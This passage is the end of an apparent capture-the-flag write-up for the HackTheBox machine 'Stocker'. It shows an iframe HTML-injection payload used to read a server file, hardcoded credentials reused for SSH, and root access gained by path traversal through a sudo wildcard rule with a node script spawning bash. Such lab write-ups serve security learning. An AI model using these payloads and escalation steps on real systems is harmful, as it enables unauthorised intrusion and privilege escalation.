<span class="o">{</span><span class="s2">"basket"</span>:[<span class="o">{</span><span class="s2">"_id"</span>:<span class="s2">"638f116eeb060210cbd83a8d"</span>,<span class="s2">"title"</span>:<span class="s2">"&lt;iframe frameborder='0' height='750' scrolling='no' src='/var/www/dev/index.js' width='750'&gt;&lt;/iframe&gt;"</span>,<span class="s2">"description"</span>:<span class="s2">"It's a red cup."</span>,<span class="s2">"image"</span>:<span class="s2">"red-cup.jpg"</span>,<span class="s2">"price"</span>:32,<span class="s2">"currentStock"</span>:4,<span class="s2">"__v"</span>:0,<span class="s2">"amount"</span>:1<span class="o">}]}</span>

</code></pre></div></div>

<p><img src="/assets/images/writeups/stocker/8.png" alt="" /></p>

<p>In the database connection string, hardcoded credentials can be seen, <code class="language-plaintext highlighter-rouge">dev:IHeardPassphrasesArePrettySecure</code>.</p>

<h1 id="shell-as-angoose">SHELL AS ANGOOSE</h1>

<p>We have a valid username <code class="language-plaintext highlighter-rouge">angoose</code> and a possible credential <code class="language-plaintext highlighter-rouge">IHeardPassphrasesArePrettySecure</code> from <code class="language-plaintext highlighter-rouge">index.js</code>.</p>

<p>If the user reuses the same credentials for SSH, we will be able to login to the box via SSH on port 22.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
┌──<span class="o">(</span>n3hal㉿Universe7<span class="o">)</span>-[~]
└─<span class="nv">$ </span>ssh angoose@stocker.htb
angoose@stocker.htb<span class="s1">'s password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$ id; whoami
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose

</span></code></pre></div></div>

<p>We are successful in logging in to the box.</p>

<h1 id="privilege-escalation-to-root">PRIVILEGE ESCALATION TO ROOT</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
angoose@stocker:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> password <span class="k">for </span>angoose: 
Matching Defaults entries <span class="k">for </span>angoose on stocker:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User angoose may run the following commands on stocker:
    <span class="o">(</span>ALL<span class="o">)</span> /usr/bin/node /usr/local/scripts/<span class="k">*</span>.js

</code></pre></div></div>

<p>The current user can run any javascript script which is supposed to be in <code class="language-plaintext highlighter-rouge">/usr/local/scripts</code> with superuser permissions.</p>

<p>But note that we have a wildcard here.</p>

<p>With the wildcard, we can potentially use dot-dot-slash sequences to iterate through any arbitrary directory and run node scripts from any directory we can control.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
angoose@stocker:~<span class="nv">$ </span><span class="nb">cat</span> /tmp/curiosity.js 
console.log<span class="o">(</span><span class="s2">"I can run any script from any directory with root permissions"</span><span class="o">)</span>
angoose@stocker:~<span class="nv">$ </span>
angoose@stocker:~<span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/node /usr/local/scripts/../../../tmp/curiosity.js 
I can run any script from any directory with root permissions

</code></pre></div></div>

<p>To demonstrate what I said above, I have created a simple JS script in <code class="language-plaintext highlighter-rouge">/tmp</code>.</p>

<p>Then I used <code class="language-plaintext highlighter-rouge">../</code> sequences to iterate from <code class="language-plaintext highlighter-rouge">/usr/local/scripts</code> to <code class="language-plaintext highlighter-rouge">/tmp/curiosity.js</code>. Since I ran the node script with <code class="language-plaintext highlighter-rouge">sudo</code> we are able to run it with elevated privileges.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
angoose@stocker:~<span class="nv">$ </span><span class="nb">cat</span> /tmp/curiosity.js 
require<span class="o">(</span><span class="s2">"child_process"</span><span class="o">)</span>.spawn<span class="o">(</span><span class="s2">"/bin/bash"</span>, <span class="o">{</span>stdio: <span class="o">[</span>0, 1, 2]<span class="o">})</span>
angoose@stocker:~<span class="nv">$ </span>
angoose@stocker:~<span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/node /usr/local/scripts/../../../tmp/curiosity.js 
root@stocker:/home/angoose# 
root@stocker:/home/angoose# 
root@stocker:/home/angoose# <span class="nb">cd
</span>root@stocker:~# <span class="nb">id</span><span class="p">;</span> <span class="nb">whoami
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
root

</code></pre></div></div>

<p>I have edited the JS script to spawn a <code class="language-plaintext highlighter-rouge">bash</code> shell.</p>

<p>So when we run the script again with <code class="language-plaintext highlighter-rouge">sudo</code>, we got a <code class="language-plaintext highlighter-rouge">root</code> shell.</p>

<h1 id="conclusion">CONCLUSION</h1>

<p>As it can be seen, the box is pretty straight-forward. It seems a bit lengthy considering that it is an easy rated box.</p>

<p>The box is all about finding a juicy subdomain, followed by discovering a NoSQL injection vulnerability, an arbitrary file read vulnerability escalated from a simple HTML injection and finally discovering hardcoded reusable credentials.</p>

<p>The privilege escalation part is also something that can seen as pretty obvious.</p>

<p>So, that is all in this box.</p>

<p>Thanks for reading this far. I hope you liked it.</p>




  <small>tags: <em>nosql injection</em> - <em>arbitrary file read</em> - <em>nodejs</em></small>


      </section>
    </div>
  </body>
</html>
